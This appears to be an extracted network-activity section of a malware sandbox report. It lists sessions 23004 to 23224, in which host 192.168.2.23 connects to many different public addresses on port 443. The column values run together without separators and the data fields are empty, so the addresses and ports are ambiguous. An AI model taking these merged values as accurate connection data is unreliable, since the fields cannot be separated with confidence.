                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23004192.168.2.234137280.201.117.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23005192.168.2.233837441.141.67.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23006192.168.2.2341168152.62.134.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23007192.168.2.2336286212.202.176.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23008192.168.2.2341710120.87.200.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23009192.168.2.2359046184.218.26.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23010192.168.2.235344050.232.171.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23011192.168.2.234954860.178.195.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23012192.168.2.2342880140.15.110.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23013192.168.2.235671490.66.51.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23014192.168.2.2341694175.120.67.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23015192.168.2.2334640157.119.187.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23016192.168.2.235016034.160.18.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23017192.168.2.2359800143.160.206.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23018192.168.2.235184486.207.101.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23019192.168.2.235233261.216.47.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23020192.168.2.233842038.120.118.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23021192.168.2.2339644208.244.117.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23022192.168.2.2343890121.89.38.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23023192.168.2.2335842216.158.4.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23024192.168.2.2347792212.139.20.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23025192.168.2.234266695.47.210.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23026192.168.2.2336140115.214.233.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23027192.168.2.2336036167.137.197.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23028192.168.2.2352978156.116.150.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23029192.168.2.2354622203.33.216.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23030192.168.2.233353053.83.185.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23031192.168.2.2341134192.113.122.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23032192.168.2.2349940170.20.69.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23033192.168.2.2340956165.185.3.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23034192.168.2.234504839.199.93.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23035192.168.2.2358484106.81.197.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23036192.168.2.235726275.244.2.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23037192.168.2.2346656184.200.224.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23038192.168.2.235145842.25.254.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23039192.168.2.2350780142.216.100.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23040192.168.2.2333956154.192.198.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23041192.168.2.2337230142.160.166.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23042192.168.2.235702864.152.226.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23043192.168.2.234642878.56.201.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23044192.168.2.234300049.28.91.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23045192.168.2.2334960100.173.240.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23046192.168.2.2355584173.155.231.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23047192.168.2.2353212151.182.191.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23048192.168.2.2348268191.223.60.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23049192.168.2.234748463.33.208.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23050192.168.2.2336166126.203.172.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23051192.168.2.233853099.63.57.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23052192.168.2.235507625.93.50.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23053192.168.2.2351884107.135.125.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23054192.168.2.2334178206.158.83.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23055192.168.2.234566649.13.2.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23056192.168.2.23440684.193.165.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23057192.168.2.235289043.188.252.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23058192.168.2.2355304209.194.37.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23059192.168.2.234944413.205.34.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23060192.168.2.2335842171.187.10.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23061192.168.2.235716619.61.243.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23062192.168.2.234550219.253.120.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23063192.168.2.234767664.61.195.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23064192.168.2.2360040192.178.145.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23065192.168.2.2342776152.178.125.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23066192.168.2.23412245.7.148.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23067192.168.2.2342176208.202.18.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23068192.168.2.234191480.181.49.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23069192.168.2.2353720200.23.39.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23070192.168.2.23398409.55.64.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23071192.168.2.2360274176.239.143.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23072192.168.2.2355362207.82.238.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23073192.168.2.234689642.194.47.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23074192.168.2.2356900179.239.231.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23075192.168.2.2334420132.75.7.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23076192.168.2.235250896.252.77.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23077192.168.2.2337048169.82.219.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23078192.168.2.2360482217.254.34.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23079192.168.2.235099841.90.129.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23080192.168.2.234566048.12.90.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23081192.168.2.2356588129.210.116.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23082192.168.2.2353956128.148.217.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23083192.168.2.2340400101.16.153.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23084192.168.2.2352432198.106.59.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23085192.168.2.233647234.243.127.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23086192.168.2.235889417.136.188.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23087192.168.2.2352586177.20.126.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23088192.168.2.2360140182.89.148.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23089192.168.2.2345404184.131.243.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23090192.168.2.234381694.131.120.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23091192.168.2.2337670157.119.41.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23092192.168.2.2338074125.198.84.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23093192.168.2.235710685.61.120.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23094192.168.2.2359752210.129.147.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23095192.168.2.233507232.118.59.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23096192.168.2.23522162.44.14.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23097192.168.2.233628061.69.49.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23098192.168.2.234592218.115.60.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23099192.168.2.2352800141.61.58.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23100192.168.2.2338542139.225.60.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23101192.168.2.235332290.133.186.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23102192.168.2.2351700191.141.220.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23103192.168.2.2355568129.74.24.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23104192.168.2.235041685.227.247.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23105192.168.2.2346022129.145.159.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23106192.168.2.2335210213.104.251.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23107192.168.2.234997247.62.48.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23108192.168.2.235488650.210.197.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23109192.168.2.2350164132.248.185.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23110192.168.2.2344706202.140.21.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23111192.168.2.234003432.22.177.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23112192.168.2.234308858.248.204.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23113192.168.2.2351818121.242.230.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23114192.168.2.2335800204.147.43.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23115192.168.2.2354478219.81.177.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23116192.168.2.2351962220.77.191.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23117192.168.2.2350028135.65.178.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23118192.168.2.2359932195.9.124.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23119192.168.2.233692471.7.220.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23120192.168.2.233744082.121.32.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23121192.168.2.2341942131.33.179.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23122192.168.2.2340144161.236.24.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23123192.168.2.23402302.93.15.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23124192.168.2.2350836128.52.100.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23125192.168.2.235673841.237.101.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23126192.168.2.2358146194.137.176.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23127192.168.2.234512860.220.12.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23128192.168.2.2358614213.17.86.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23129192.168.2.2333168141.178.44.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23130192.168.2.2338662167.218.27.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23131192.168.2.2345278195.9.145.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23132192.168.2.235876012.223.134.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23133192.168.2.2334240157.210.158.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23134192.168.2.233412025.5.187.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23135192.168.2.2359064172.166.159.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23136192.168.2.2353636149.239.154.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23137192.168.2.234438078.159.19.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23138192.168.2.2342012199.166.241.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23139192.168.2.235825227.84.142.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23140192.168.2.235833681.146.246.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23141192.168.2.235155014.124.125.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23142192.168.2.235035614.146.83.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23143192.168.2.2355450141.21.160.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23144192.168.2.234221898.46.239.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23145192.168.2.234875845.197.21.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23146192.168.2.2340082191.121.140.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23147192.168.2.2350926126.192.43.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23148192.168.2.235652469.155.156.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23149192.168.2.2341448194.152.3.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23150192.168.2.234652242.75.31.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23151192.168.2.2355976139.163.213.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23152192.168.2.2335588170.49.100.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23153192.168.2.2341210187.228.229.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23154192.168.2.233447099.58.138.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23155192.168.2.2342964128.127.233.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23156192.168.2.2349218111.105.46.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23157192.168.2.234173462.1.76.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23158192.168.2.2333404217.123.130.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23159192.168.2.233726053.103.96.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23160192.168.2.233923092.114.206.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23161192.168.2.2356034195.75.11.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23162192.168.2.2358662156.208.162.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23163192.168.2.2348686121.48.114.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23164192.168.2.2354006147.97.45.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23165192.168.2.234270620.146.103.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23166192.168.2.236020293.181.162.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23167192.168.2.2336076147.104.32.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23168192.168.2.234519889.77.35.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23169192.168.2.2359784176.3.148.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23170192.168.2.2334634187.251.152.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23171192.168.2.235637643.100.79.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23172192.168.2.2353528133.41.13.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23173192.168.2.235328891.227.16.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23174192.168.2.235197863.21.208.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23175192.168.2.2336992154.44.39.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23176192.168.2.2351352152.36.124.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23177192.168.2.2339376179.190.251.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23178192.168.2.2342184203.187.115.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23179192.168.2.2351520183.98.62.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23180192.168.2.2336336172.189.199.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23181192.168.2.233506889.24.122.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23182192.168.2.234211294.5.238.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23183192.168.2.2335760150.211.183.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23184192.168.2.2336168103.172.252.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23185192.168.2.2340480130.211.135.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23186192.168.2.23591505.58.46.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23187192.168.2.2333612204.63.197.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23188192.168.2.2343380196.8.120.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23189192.168.2.2347844129.74.82.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23190192.168.2.2360522144.49.11.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23191192.168.2.2360210107.93.246.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23192192.168.2.234265465.107.205.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23193192.168.2.2335496114.239.214.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23194192.168.2.234448827.26.53.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23195192.168.2.2354032115.34.67.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23196192.168.2.2357986186.172.148.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23197192.168.2.2349528100.159.203.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23198192.168.2.233727092.122.7.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23199192.168.2.2350838197.96.250.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23200192.168.2.234769070.253.160.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23201192.168.2.2333354202.106.251.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23202192.168.2.2355684144.194.231.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23203192.168.2.2342662119.139.79.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23204192.168.2.2341962106.79.248.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23205192.168.2.236054834.21.43.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23206192.168.2.2357024168.60.160.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23207192.168.2.233989046.193.4.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23208192.168.2.2343906168.156.61.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23209192.168.2.2347070205.20.172.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23210192.168.2.2360910159.1.245.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23211192.168.2.234749625.142.210.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23212192.168.2.2352264211.37.248.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23213192.168.2.23401348.248.112.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23214192.168.2.234540040.169.16.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23215192.168.2.2358764221.132.132.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23216192.168.2.2352352164.131.61.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23217192.168.2.2351368175.15.21.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23218192.168.2.234387894.251.120.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23219192.168.2.2338988180.16.228.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23220192.168.2.2334614124.45.77.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23221192.168.2.235685664.163.66.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23222192.168.2.233423257.236.50.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23223192.168.2.2352474119.49.203.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23224192.168.2.2334020185.154.234.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
